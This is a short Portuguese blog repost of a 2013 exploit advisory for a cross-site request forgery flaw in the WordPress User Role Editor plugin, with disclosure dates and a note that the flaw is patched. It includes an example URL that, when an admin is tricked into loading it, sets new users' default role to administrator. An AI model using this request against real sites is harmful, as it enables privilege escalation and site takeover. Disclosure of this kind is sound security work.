quinta-feira, 6 de junho de 2013

Exploit WP função do usuário Editor de CSRF


# Exploit Título: WP função do usuário Editor de CSRF

# Exploit Título: WP função do usuário Editor de CSRF
# Data: 19/5/13
# Exploit Autor: Henry Hoggard
# Autor Website: http://henryhoggard.co.uk
# Vendedor Homepage:https://wordpress.org/support/plugin/user-role-editor
# Software Link:https://wordpress.org/support/plugin/user-role-editor
# Versão: < =3 .12
# Provado on: Debian
# CVE : none yet

Dev notificado: 16/05/13
Patch lançado (3.14): 17/05/13

Descrição:
Isso permite que você se inscrever com privilégios de administrador, se você fizer o administrador
visitar o seu roteiro CSRF.

WP da Versão: < =3 .12
Exemplo de url:
"http://server_vulneravel/wordpress/wp-admin/users.php?page=user-role-editor.php&action=default&user_role=administrator"